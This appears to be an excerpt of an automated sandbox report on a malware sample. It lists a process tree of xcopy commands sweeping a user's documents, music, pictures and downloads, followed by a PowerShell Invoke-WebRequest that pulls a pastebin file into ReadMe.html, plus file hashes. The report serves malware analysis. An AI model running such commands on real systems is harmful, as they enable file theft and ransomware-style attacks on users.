C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Recently.docx2⤵PID:1396
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ShowUse.xla2⤵PID:1576
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\StartAdd.odp2⤵PID:672
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\StartEdit.vssm2⤵PID:336
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\SuspendStop.vsdx2⤵PID:1956
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\SwitchInstall.pot2⤵PID:1068
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\These.docx2⤵PID:1076
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\UninstallMerge.vst2⤵PID:1836
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\UnpublishClear.docm2⤵PID:1452
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\AddRestart.M2V2⤵PID:1728
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\BackupDismount.fon2⤵PID:468
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\CloseFormat.raw2⤵PID:1468
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\CompleteExport.wpl2⤵PID:1676
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\DismountConvertTo.wmv2⤵PID:1504
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\DismountRegister.xht2⤵PID:1604
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\DismountUnprotect.easmx2⤵PID:1620
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\ExportSend.jpeg2⤵PID:1348
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\GrantClose.wvx2⤵PID:1276
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\InitializeLimit.vdx2⤵PID:560
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\JoinRestore.M2T2⤵PID:1340
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\LimitBackup.pps2⤵PID:1672
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\OpenTest.jpg2⤵PID:1900
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\OutStop.bat2⤵PID:812
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\PingConfirm.vst2⤵PID:1688
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RedoConfirm.kix2⤵PID:968
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RemoveRename.ADTS2⤵PID:1904
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RenameTrace.7z2⤵PID:1896
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RepairExpand.au32⤵PID:1976
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\ResolveTrace.txt2⤵PID:1684
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\ResumeUpdate.ttf2⤵PID:1716
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SaveFormat.vbs2⤵PID:936
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SearchEnter.edrwx2⤵PID:1448
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SearchStep.cr22⤵PID:2016
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SelectSave.M2V2⤵PID:1224
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SetDeny.exe2⤵PID:1744
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SuspendBlock.dwg2⤵PID:1136
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SwitchNew.dwfx2⤵PID:1732
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ConfirmSwitch.jpg2⤵PID:1748
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ConvertFromExport.dwg2⤵PID:1276
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DebugSend.pcx2⤵PID:560
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DisableStep.dwg2⤵PID:1340
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DismountMove.bmp2⤵PID:1672
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DismountSearch.dxf2⤵PID:1900
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\EditGroup.jpg2⤵PID:812
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ExportHide.jpeg2⤵PID:1688
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\FindUndo.tif2⤵PID:968
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\FormatGet.tif2⤵PID:1904
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\InvokeFind.emf2⤵PID:1896
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\LockDisable.svg2⤵PID:1976
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\MeasureCheckpoint.emz2⤵PID:1684
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\My Wallpaper.jpg2⤵PID:1716
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\NewCopy.jpg2⤵PID:936
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\PingCompress.ico2⤵PID:1448
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ProtectMeasure.png2⤵PID:2016
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\PublishWait.raw2⤵PID:1224
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RedoRevoke.wmf2⤵PID:1744
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RenameExit.tif2⤵PID:1136
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ResolveShow.dib2⤵PID:1732
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RestoreLimit.crw2⤵PID:1748
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RestoreUndo.crw2⤵PID:1276
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ResumeInitialize.cr22⤵PID:560
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\SubmitDebug.dib2⤵PID:1340
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\SwitchExport.dxf2⤵PID:1672
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\TraceNew.pcx2⤵PID:1900
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\UnlockSave.emz2⤵PID:812
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\UnregisterNew.emz2⤵PID:1688
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\UnregisterShow.jpg2⤵PID:968
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\WaitOpen.jpg2⤵PID:1904
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\WriteSkip.raw2⤵PID:1896
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ApproveClear.fon2⤵PID:1976
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\BlockPop.mid2⤵PID:1684
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\CheckpointJoin.mpeg2⤵PID:1716
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ClearUnblock.txt2⤵PID:936
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DebugSkip.xls2⤵PID:1448
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DenyRedo.snd2⤵PID:2016
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DisableGet.wmx2⤵PID:1224
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DisconnectConvert.vdx2⤵PID:1744
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DisconnectRequest.html2⤵PID:1136
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ExpandConfirm.sql2⤵PID:1732
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\GrantClose.gif2⤵PID:1748
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\GroupConfirm.jfif2⤵PID:1276
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\HideCompress.wdp2⤵PID:560
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\HideUnlock.iso2⤵PID:1340
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ImportHide.ppt2⤵PID:1672
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\InstallSkip.mp22⤵PID:1900
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\LockSplit.TTS2⤵PID:812
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\MeasureDisable.php2⤵PID:1688
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\MeasureWait.TTS2⤵PID:968
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\NewTest.wm2⤵PID:1904
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\PublishRegister.cab2⤵PID:1896
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ReadStop.xsl2⤵PID:1976
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\RemoveCheckpoint.shtml2⤵PID:1684
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ResetPush.aiff2⤵PID:1716
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\RestoreRequest.wax2⤵PID:936
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\RevokeDisconnect.M2V2⤵PID:1448
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\SaveUse.MOD2⤵PID:2016
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\SelectInstall.3g22⤵PID:1224
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\SuspendOpen.mpp2⤵PID:1744
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\TraceGroup.jpeg2⤵PID:1136
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\UninstallEdit.wpl2⤵PID:1732
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\UnlockSplit.AAC2⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/CSGTwG5A -outfile ReadMe.html"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5db8349341427b8c6723a6307bcfde310
SHA13af17699c8a60c2d110cb5768af1591c7ed742cf
SHA2560d120c081d1099e20b7095a7aef3da3d697790a96c28e363e6eb1148e4fec64d
SHA512931fadf2bf665509c48af49db9ca95e671db5f1ca03152cec97621e88964cc5ce00db9eed5b5ab4074131ef84df062ca52b4ab606a275ae11d36a41a4b7e5de4
-
Filesize
71B
MD53544e4b7ac1418d34061648a9f3e3dc6
SHA130e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
SHA256db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
SHA5125d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126